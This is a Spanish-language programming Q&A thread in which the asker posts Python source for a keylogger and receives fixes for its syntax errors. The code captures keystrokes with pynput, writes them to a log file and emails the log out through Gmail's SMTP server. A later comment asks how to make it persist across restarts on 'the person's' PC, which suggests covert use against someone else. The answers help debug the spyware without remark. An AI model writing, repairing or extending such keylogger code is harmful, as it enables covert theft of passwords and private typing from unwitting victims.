# El syntax es invalido

Tags: python

Cuando ejecuto el archivo python en el CMD, dice que el syntax es invalido de esta expresión:

> *def* lista_tecla = []

Desconozco el porque del error.

```
import pynput.keyboard
import smtplib
import time
from email.mime.multipart import MIMEMultipart 
from email.mime.text import MIMEText

log_file = open('log.txt', 'w+')

def enviar_datos():
    msg=MimeMultipart()
    password= "Contraseña 16 dígitos"
    msg['From'] = "correo@gmail.com"
    msg['To'] = "correo@gmail.com"
    msg['Subject'] = "Keylogger"
    msg.attach(MIMEText(open('log.txt').read()))
    
    try:
        server = smtplib.SMTP('smtp.gmail.com:587')
        server.starttls()
        server.login(msg['From'],password)
        server.sendmail(msg['From'],msg['To'],msg.as_string())
        server.quit()
    
    except:
        pass

def imprimir():
    tecla = ''.join(lista_tecla)
    log_file.write(tecla)
    log.file.write('\n')
    log_file.close()
    time.sleep(3)
    enviar_datos()

def lista_tecla = []

def presiona(key):
    key1= convertir(key)

    if key1 == "Key.esc":
        print("Saliendo...")
        imprimir()
        return False
    
    elif key1 == "Key.space":
        lista_tecla.append(" ")

    elif key1 == "Key.enter":
        lista_tecla.append('\n')
```

Entiendo que ahí tengo mal escrito el *define*. Pero ¿cómo lo puedo corregir? Esa sería la pregunta. Ahora, también me está dando este error:

> AttributeError: 'function' object has no attribute 'append'

Comment: El segundo error va relacionado con el primero, por utilizar def para declarar una lista y te avisa que el objeto función no posee o no puedes usar el método append como si se puede en una lista

Comment: No cambies tu pregutna por una nueva. Si la respuesta que te dieron, soluciona esta pregunta, entonces aceptala. Y si tenes una nueva pregunta, hacela, y si necesitas, referencia esta...

Answer (score 1):

Es fácil decir cual es el error, pues estas empleando mal la palabra `def`, pero vamos a explicar un poco por que esta mal.

`def` es una palabra reservada, la cual define a una función, es equivalente a hacer `function` en JavaScript, como dije esto es exclusivo para definir una funcion por lo que no puede ser empleado para otro objeto. AL hacer `def lista_tecla = []` estas diciendo que existe una función llamada `lista_tecla` sin embargo aquí viene tu primer error, el cual seguro será un `SyntaxError` pues la sintaxis de una función es:

```
def name_function():
    code
```

Y a ti te faltan los paréntesis y los 2 punto `:`. La [documentación](https://docs.python.org/es/3/tutorial/controlflow.html#defining-functions) entra mas en detalle.

> La palabra reservada [def](https://docs.python.org/es/3/reference/compound_stmts.html#def) se usa para definir funciones. Debe seguirle el nombre de la función y la lista de parámetros formales entre paréntesis. Las sentencias que forman el cuerpo de la función empiezan en la línea siguiente, y deben estar con sangría.

Tu segundo error proviene de este primero, pues una definición función es una sentencia que puede ser llamada y ejecutada y no poseen las mismas características de los objetos `list` (listas `[]`), lo que quiere decir que no poseen un método `append()`, que es propio de una lista.

Mas información sobre la [definición de una función](https://docs.python.org/es/3/reference/compound_stmts.html#def)

Para finalizar, la sintaxis correcta de inicializar una variable en Python es de esta forma:

```py
var_name = value
```

En tu caso seria

```py
lista_tecla = []
```

Donde la variable lista seria un nuevo dato de tipo `list`

Ahora, por la cuestión que *log* no está definido. Simplemente, cambia *log.file* por *log_file* (al ser éste un error ortográfico).

Comment: Ok. Muchas gracias. Ahora, sin embargo, log me aparece como no definido. log.file.write('\n')   ¿Por qué? Si yo previamente ya defini que log_file es igual a log.txt

Comment: Una cosa es `log_file` y otra muy distinta es `log.file`

Comment: ahhh ya no me di cuenta de la diferencia jaja. ¿Por lo tanto, tendría que definir log? No lo creo.

Comment: Si pero para tu problema no, solo reemplazalo por `log_file`

Comment: Ahh ya, era un error tipográfico.

Comment: Oye, sabes que ahora me pone que MIMEMultipart no está definido: NameError: name 'MimeMultipart' is not defined   Esto ocurre en: def enviar_datos():
    msg=MimeMultipart()      Según yo al final le faltan los dos puntos, no?

Comment: Escribe lo bien, respeta las mayúsculas y minúsculas

Comment: Por último (y disculpa la ignorancia, no soy muy bueno en Python jaja), como puedo hacerle para que el keylogger sea persistente, o sea, que su duración no sea limitada y que funcione cada vez que la persona reinicia su PC. Me imagino que para esa cuestión se podría modificar la parte que dice:   p1.join(timeout=300) ; p2.join(timeout=300) ; p3.join(timeout=300) ; p4.join(timeout=300)  El número 300 indicaría que se trata de 5 minutos de duración, podría o bien borrar esa línea o bien poner más segundos, algo así como 3600000 segundos no jaja.

Comment: Eso esta fuera del tema de la pregunta, recomiendo que hagas otra pregunta añadiendo todos los detalles dudas y dificultades que tengas

Comment: [Continuemos el debate en el chat](https://chat.stackexchange.com/rooms/126600/discussion-between-mario1sqr141402-and-christian).

Comment: [Continuemos el debate en el chat](https://chat.stackexchange.com/rooms/126602/discussion-between-mario1sqr141402-and-christian).

Answer (score 0):

`def` **def**ine una función, no una variable. Sólo hay que cambiar el código de

```
def lista_tecla = []
```

a

```
lista_tecla = []
```